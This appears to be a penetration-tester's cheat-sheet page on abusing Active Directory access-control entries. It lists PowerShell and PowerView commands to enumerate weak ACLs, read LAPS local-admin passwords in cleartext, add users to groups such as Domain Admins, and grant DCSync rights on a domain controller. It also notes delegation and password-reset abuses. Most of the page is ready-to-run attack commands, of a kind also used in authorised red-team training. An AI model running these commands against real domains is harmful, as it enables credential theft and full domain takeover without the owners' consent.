ACL Abuse

Enumeration
ADModule
PowerView_Dev
PowerView
# Import
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1
​
# Get DistinguishedName
Get-ADUser -Identity USER
​
# Find ACLs related to that user
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access
Find-InterestingDomainACL -ResolveGUIDs
Invoke-ACLScanner -ResolveGUIDs
ReadProperty, ExtendedRight over OU / Computer Object
Most likely LAPS. The IdentityReferenceName can read the LAPS password in cleartext for the OU.
LAPS Module
# Import module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1 
​
# Find the OUs that can read LAPS passwords
Find-AdmPwdExtendedRights -Identity <OU>
​
# Once we have compromised a user that can read LAPS
Get-AdmPwdPassword -ComputerName <targetmachine>
WriteProperty | Self-Membership | GenericAll over Group
Can add members to the group 
ADModule
PowerView_dev
# Add
Add-ADGroupMember -Identity "LocalAdmins" -Members USERS
​
# Check
Get-ADGroupMember -Identity "LocalAdmins"
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'
GenericWrite | GenericAll | WriteProperty over Computer Object
Can perform Resource Based Constrained Delegation Attack
​
GenericAll over User Object
Can reset their password without knowing the old one 
​
WriteDACL over DC
Can give DCSync privs to user
RACE
PowerView3
Set-ADACL -SamAccountName USER\DOMAIN DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose
Add-DomainObjectAcl -PrincipalIdentity USER -Rights DCSync
​
Resources
Abusing Active Directory ACLs/ACEs
Red Teaming Experiments
​

Last modified 2yr ago